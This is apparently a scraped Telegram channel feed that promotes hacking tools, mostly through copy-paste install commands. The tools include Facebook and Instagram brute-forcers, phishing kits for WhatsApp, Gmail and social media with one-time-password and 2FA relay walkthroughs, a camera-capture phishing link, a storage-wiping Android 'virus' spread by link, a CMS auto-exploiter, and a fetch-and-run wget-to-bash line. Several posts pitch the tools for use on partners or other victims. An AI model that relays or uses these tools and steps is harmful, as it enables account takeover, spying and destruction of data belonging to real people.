Brutal
Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device
Getting Started
Enjoy π
Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device
Getting Started
git clone https://github.com/Screetsec/Brutal.git
cd Brutal
chmod +x Brutal.sh
sudo ./Brutal.sh or sudo su ./Brutal.shEnjoy π
π19β€6π3π±2
Install Requirements "On Linux"
$
$
$
$
$
$
git clone https://github.com/IAmBlackHacker/Facebook-BruteForce$
cd Facebook-BruteForce$
python3 -m pip install requests bs4$
python3 -m pip install mechanize$
python3 fb.py or python fb2.pyπ11π3β€2π1
TERMUX COMMANDD
OTP Bypass Instructions When victim enter his credentials, you need to go to original website and use those credentials to send real OTP to victim. Once he enter that OTP such OTP will also be there with you and you will be allowed to login the account beforeβ¦
How to Intsall & Use
$
$
$
$
$
git clone https://github.com/Ignitetch/whatsapp-phishing.git
$
cd whatsapp-phishing$
chmod 777 Whatsapp.sh$
./Whatsapp.shπ21β€5π5π₯3π₯°1
ABOUT TOOL :
All in one Instagram hacking tool available (Insta information gathering, Insta brute force, Insta account auto repoter)
FEATURES:
β’ Insta information gathering
β’ Insta brute force attack
β’ Insta auto repoter
β’ Update script
β’ Remove script
REQUIREMENTS:
β’ Data connection
β’ Internet 200MB
β’ storage 400MB
β’ No Root
Available On
β’ Termux
β’ Kali Linux
TEST ON:
β’ Termux
β’ Mi Note 9 pro
INSTALLATION [Termux]
β’
β’
β’
β’
β’
β’
β’
β’
β’
β’
β’
β’
INSTALLATION [Kali Linux]
β’
ENJOY βΊοΈ @TERMUXCOMMANDD
All in one Instagram hacking tool available (Insta information gathering, Insta brute force, Insta account auto repoter)
FEATURES:
β’ Insta information gathering
β’ Insta brute force attack
β’ Insta auto repoter
β’ Update script
β’ Remove script
REQUIREMENTS:
β’ Data connection
β’ Internet 200MB
β’ storage 400MB
β’ No Root
Available On
β’ Termux
β’ Kali Linux
TEST ON:
β’ Termux
β’ Mi Note 9 pro
INSTALLATION [Termux]
β’
apt updateβ’
apt upgradeβ’
pkg install pythonβ’
pkg install python2β’
pkg install gitβ’
git clone https://github.com/IncredibleHacker/insta-hackβ’
lsβ’
cd insta-hackβ’
pip3 install -r requirements.txtβ’
chmod +x *β’
bash setup.shβ’
bash insta-hack.shINSTALLATION [Kali Linux]
β’
sudo apt install python
β’ sudo apt install python2
β’ sudo apt install git
β’ git clone https://github.com/IncredibleHacker/insta-hack
β’ ls
β’ cd insta-hack
β’ pip3 install -r requirements.txt
β’ chmod +x *
β’ sudo bash insta-hack.shπ32β€6π3π2π1
ABOUT TOOL :
mrphish is a bash based script which is officially made for phishing social media accounts with portforwarding and otp bypassing cntrole. This tool works on both rooted Android device and Non-rooted Android device.
REQUIREMENTS :
internet 400
php
storage 600 MB
ngrok Token
INSTALLATION [Termux] :
[+]-- Open new session in termux and type tor
[+]-- Open second session in termux and execute mrphish tool
USAGE OPTIONS [Termux] :
START ATTACK :
From this option you can start attack and explore available option in tool Type ok in next step.
DUMPS :
From this option you can get old saved dumps of all ids.
UPDATE :
From this option you can update mrphish tool if updates are available for that
ENJOY π @TERMUXCOMMANDD
mrphish is a bash based script which is officially made for phishing social media accounts with portforwarding and otp bypassing cntrole. This tool works on both rooted Android device and Non-rooted Android device.
REQUIREMENTS :
php
storage 600 MB
ngrok Token
INSTALLATION [Termux] :
apt-get update -y
apt-get upgrade -y
pkg install python -y
pkg install python2 -y
pkg install git -y
pip install lolcat
git clone https://github.com/noob-hackers/mrphish
cd $HOME
ls
cd mrphish
ls
bash setup
bash mrphish[+]-- Open new session in termux and type tor
[+]-- Open second session in termux and execute mrphish tool
USAGE OPTIONS [Termux] :
START ATTACK :
From this option you can start attack and explore available option in tool Type ok in next step.
DUMPS :
From this option you can get old saved dumps of all ids.
UPDATE :
From this option you can update mrphish tool if updates are available for that
π21β€4
This media is not supported in your browser
VIEW IN TELEGRAM
GMAIL PHISING WITH 2FA
DESCRIPTION :
Two-factor authentication (2FA) adds an additional layer of protection in authentication systems consisting on the proof that the user shows to be the real user. This repository aims at demonstrating how the attackers can bypass 2FA for gmail's authentication system. In this case, the two factors are password and a code sent to mobile user.
ππ»ππ»ππ»ππ»ππ»ππ»ππ»ππ»
DESCRIPTION :
Two-factor authentication (2FA) adds an additional layer of protection in authentication systems consisting on the proof that the user shows to be the real user. This repository aims at demonstrating how the attackers can bypass 2FA for gmail's authentication system. In this case, the two factors are password and a code sent to mobile user.
ππ»ππ»ππ»ππ»ππ»ππ»ππ»ππ»
π13π₯°2β€1
DEPENDENCIES-
Apache2
Python
Selenium
WHAT DOES THE REPOSITORY INCLUDE?
gmailPhising: contains the code of the gmail's authetication web.
logingmail.py: script for running the web browser "impersonating" the victim's login in the attacker's machine. This makes use of Selenium.
root.sh: this script running logingmail.py. Must be run as root for user www-data. This is configured in /etc/sudoers of the attacker's machine including the
following:
www-data ALL=(user) NOPASSWD: pathtoscript/root.sh
How to run ? .
The attacker using hacking techniques (dnsspoofing, social engineering, etc.) redirect the victim with 2FA active in gmail to fake gmail web. Once the victim logs in the fake web, the attacker's machine will run a web browser and it will go to original gmail to log in with victim's credentials. This will cause gmail send the validation code to the victim. When the victim receives the code, he will put it in the fake web. The attacker will get the code and will complete the log in the original gmail web, gaining the access to the victim account.
ENJOY βΊοΈ @TERMUXCOMMANDD
Apache2
Python
Selenium
WHAT DOES THE REPOSITORY INCLUDE?
gmailPhising: contains the code of the gmail's authetication web.
logingmail.py: script for running the web browser "impersonating" the victim's login in the attacker's machine. This makes use of Selenium.
root.sh: this script running logingmail.py. Must be run as root for user www-data. This is configured in /etc/sudoers of the attacker's machine including the
following:
www-data ALL=(user) NOPASSWD: pathtoscript/root.sh
How to run ? .
git clone https://github.com/afernandezb92/2FAGmailPhising.git
cd 2FAGmailPhising
pip install -r requirements.txt
chmod +x run.sh
chmod +x geckodriver
./run.sh
SCENERY:
The attacker using hacking techniques (dnsspoofing, social engineering, etc.) redirect the victim with 2FA active in gmail to fake gmail web. Once the victim logs in the fake web, the attacker's machine will run a web browser and it will go to original gmail to log in with victim's credentials. This will cause gmail send the validation code to the victim. When the victim receives the code, he will put it in the fake web. The attacker will get the code and will complete the log in the original gmail web, gaining the access to the victim account.
π8β€3
This RDP Only Created by @TERMUXCOMMANDD For Educational Purpose. If You Use It on Evil Purpose, Owner is Not Responsible For That.
[+] HOW TO USE:
[+] HOW TO USE:
1 : Fork This Repository. 2 : Create a Account On ngrok 3 : Copy Your Ngrok-Token 4 : Go To Your Forked Repository's "Setting" 5 : Click on The "Sicret" Option 6 : Add Your Sicret 7 : Go To Your Forked Repository's "Action" 8 : Select Your Workflow To "Cracker-RDP" 9 : Start Your Workflow
After Starting Workflow >-----------------------<
10: Go To Ngrok 11: Click On The Endpoint Option 11: And Click On The Status Option 12: Copy The URL without "tcp://" 13: The Copied Link Like: 8.tcp.ngrok.io:15003 14: Go To Your RDP Using Software 15: Then Put Your Url 16: Put The Username: runneradmin 17: Put The Password: P@ssw0rd! 18: And Connect it >---------------------< Your RDP is Ready >---------------------<π6
ABOUT TOOL :
Infect is a bash based script which is officially made for termux users and from this tool you can spread android virus by just sending link. This tool works on both rooted Android device and Non-rooted Android device. Warning π¦ This Virus Formates (Deletes) Full Internal Storage So think and Use.
AVAILABLE ON :
Termux
FEATURES :
[+] Dangerous virus tool !
[+] Updated maintainence !
[+] Easy for beginners !
[+] Working virus tool for termux
INSTALLATION [Termux] :
ENJOY βΊοΈ @TERMUXCOMMANDD
Infect is a bash based script which is officially made for termux users and from this tool you can spread android virus by just sending link. This tool works on both rooted Android device and Non-rooted Android device. Warning π¦ This Virus Formates (Deletes) Full Internal Storage So think and Use.
AVAILABLE ON :
FEATURES :
[
[+] Updated maintainence !
[+] Easy for beginners !
[+] Working virus tool for termux
INSTALLATION [Termux] :
apt-get update -y
apt-get upgrade -y
pkg install python -y
pkg install python2 -y
pkg install git -y
pip install lolcat
git clone https://github.com/noob-hackers/infect
cd $HOME
ls
cd infect
ls
bash infect.sh[+]-- Now you need internet connection to continue further process...
[+]-- You can select any option by clicking on your keyboard
[+]-- Note:- Don't delete any of the scripts included in lol directory (folder)π12π₯°3
THE CREDIT CARD FRAUDSTER
βONLY FOR EDUCATIONAL PURPOSES β
TIPS β - IF YOU DONT KNOW DONT TRY β. @TERMUXCOMMANDD
cardNumPre = "543210"
cardNumPost = "1234"
potentialSolutions = []
for i in range(0,1000000)
: cardNumMid = (str(i).zfill(6))
ccNum = cardNumPre + cardNumMid + cardNumPost
if int(ccNum) % 123457 == 0:
print(ccNum) potentialSolutions.append(ccNum)
for j in potentialSolutions:
print("CTFlearn{" + j + "}")Hints: 1/ Luhn_algorithm
2/ Flag format is CTFlearn{card_numberβONLY FOR EDUCATIONAL PURPOSES β
TIPS β - IF YOU DONT KNOW DONT TRY β. @TERMUXCOMMANDD
π7π4β€1π1
USAGE:
1. Download ZIP here and extract the ZIP
2. Install requirements.txt by typing
3. Download Google Chrome
4. Download a Chrome driver that matches your Chrome version. Download a chromedriver here.
5. You must download the correct chromedriver that matches your Chrome version. Check out your version here
ENJOY βΊοΈ @TERMUXCOMMANDD
1. Download ZIP here and extract the ZIP
2. Install requirements.txt by typing
pip install -r requirements.txt in Command Prompt.3. Download Google Chrome
4. Download a Chrome driver that matches your Chrome version. Download a chromedriver here.
5. You must download the correct chromedriver that matches your Chrome version. Check out your version here
β€6π3π1π1
CAMHACKER -
CamHacker is a phishing tool. It will generate a link. If anyone opens the link and permits camera access, his/her photo will be captured and sent to you!
+] INSTALLATION
For termux, use additional command -
Or Run Directly -
ENJOY βΊοΈ @TERMUXCOMMANDD
CamHacker is a phishing tool. It will generate a link. If anyone opens the link and permits camera access, his/her photo will be captured and sent to you!
+] INSTALLATION
git clone https://github.com/KasRoudra/CamHacker
cd CamHacker
termux-setup-storage , bash ch.shOr Run Directly -
wget https://raw.githubusercontent.com/KasRoudra/CamHacker/main/ch.sh && bash ch.shπ16
XAttacker V2.5 Tool
A Massive Exploiting Tool capable of scanning and auto-exploiting vulnerabilities in web applications, By providing a target website to the tool, it auto detects itsβ architecture if using a Content Management Service (CMS) and tries to find vulnerabilities based on the detected CMS, After finding the vulnerabilities the tool will generate an exploit for the website and send the user the link of the exploit.
USAGE
Short Form
Long Form
Description
EXAMPLE
if you have list websites run tool with this command line
Installation Linux οΏΌ
DOWNLOAD TERMUX
Installation Windows οΏΌ :-
A Massive Exploiting Tool capable of scanning and auto-exploiting vulnerabilities in web applications, By providing a target website to the tool, it auto detects itsβ architecture if using a Content Management Service (CMS) and tries to find vulnerabilities based on the detected CMS, After finding the vulnerabilities the tool will generate an exploit for the website and send the user the link of the exploit.
USAGE
Short Form
-lLong Form
--listDescription
WebSites List
EXAMPLE
if you have list websites run tool with this command line
perl XAttacker.pl -l list.txtInstallation Linux οΏΌ
git clone https://github.com/Moham3dRiahi/XAttacker.git cd XAttacker perl XAttacker.pl
DOWNLOAD TERMUX
git clone https://github.com/Moham3dRiahi/XAttacker.git cd XAttacker chmod +x termux-install.sh bash termux-install.shInstallation Windows οΏΌ :-
Download Perl Download XAttacker Extract XAttacker into Desktop Open CMD and type the following commands: cd Desktop/XAttacker-master/ perl XAttacker.plπ5β€2
DARKARMY
Hacking Tools Pack - A Penetration Testing Framework .
Installation Linux οΏΌ
This Tool Must Run As ROOT !!! β
That's it. You can execute tool by typing DARKARMY.
INSTALLATION TERMUX.
ENJOY βΊοΈ @TERMUXCOMMANDD
Hacking Tools Pack - A Penetration Testing Framework .
Installation Linux οΏΌ
This Tool Must Run As ROOT !!! β
git clone https://github.com/D4RK-4RMY/DARKARMY.git
cd DARKARMY
chmod +x install.sh
./install.shINSTALLATION TERMUX.
pkg install git
pkg install python
git clone https://github.com/D4RK-4RMY/DARKARMY.git
cd DARKARMY
chmod +x darkarmy.py
python2 darkarmy.py
π9β€1
WEBSCRAPE )
What is WebScrabe? Why WebScrabe? WebScrape is used to collect mail ID's and phone numbers from a websites.
TERMUX INSTALLATION GUIDE
You must have use https://....
INSTALLING AND REQUIREMENTS
Linux or Unix-based system
ENJOY βΊοΈ @TERMUXCOMMANDD
What is WebScrabe? Why WebScrabe? WebScrape is used to collect mail ID's and phone numbers from a websites.
TERMUX INSTALLATION GUIDE
pkg update -y
pkg upgrade -y
pkg install git
git clone https://github.com/3xploitGuy/webscrape.git
cd webscrape
webscrape
chmod +x webscrape.sh
webscrape
bash webscrape.sh
INSTALLING AND REQUIREMENTS
Linux or Unix-based system
~ β―β―β― git clone https://github.com/3xploitGuy/webscrape.git
~ β―β―β― cd webscrape
~/webscrape β―β―β― chmod +x webscrape.sh
~/webscrape β―β―β― ./webscrape.sh
π6β€3
SOCIOPHISH -
Best Tool for Phishing With 38+ templates , Now you can Hack your Girlfreind or Boyfreind Instagram or Facebook account by jus a single link ! HAVE FUN.
FEATURES
Latest Login pages.
Mask URL support
Best for Anyone
Docker support (checkout docker-legacy branch)
Multiple tunneling options
Localhost
Ngrok (With or without hotspot)
Cloudflared (Alternative of Ngrok)
Installation
Just, Clone this repository -
$
Change to cloned directory And run
$
$
On first launch, It'll install the dependencies and that's it.
Run on Docker
$
DEPENDENCIES
SocioPhisher requires following programs to run properly -
Supported Platform : Termux, Ubuntu/Debian/Kali/Parrot, Arch Linux/Manjaro, Fedora
ENJOY π«‘ @TERMUXCOMMANDD
Best Tool for Phishing With 38+ templates , Now you can Hack your Girlfreind or Boyfreind Instagram or Facebook account by jus a single link ! HAVE FUN.
FEATURES
Latest Login pages.
Mask URL support
Best for Anyone
Docker support (checkout docker-legacy branch)
Multiple tunneling options
Localhost
Ngrok (With or without hotspot)
Cloudflared (Alternative of Ngrok)
Installation
Just, Clone this repository -
$
git clone https://github.com/alexbieber/SocioPhish.gitChange to cloned directory And run
SocioPhish.sh $
cd SocioPhish$
bash sociophisher.shOn first launch, It'll install the dependencies and that's it.
SocioPhish is installedRun on Docker
$
docker pull alexbieber/SocioPhish
$ docker run --rm -it alexbieber/SocioPhish
DEPENDENCIES
SocioPhisher requires following programs to run properly -
phpwgetcurlgit
π21β€1
QRLJACKER - QRLJACKING EXPLOITATION FRAMEWORK
QRLJacker is a highly customizable exploitation framework to demonstrate "QRLJacking Attack Vector" to show how it is easy to hijack services that depend on QR Code as an authentication and login method, Mainly it aims to raise the security awareness regarding all the services using the QR Code as a main way to login users to different services!
ππ»ππ»ππ»ππ»ππ»ππ»ππ»ππ». #WHATSAPPHACKING
QRLJacker is a highly customizable exploitation framework to demonstrate "QRLJacking Attack Vector" to show how it is easy to hijack services that depend on QR Code as an authentication and login method, Mainly it aims to raise the security awareness regarding all the services using the QR Code as a main way to login users to different services!
ππ»ππ»ππ»ππ»ππ»ππ»ππ»ππ». #WHATSAPPHACKING
π6β€1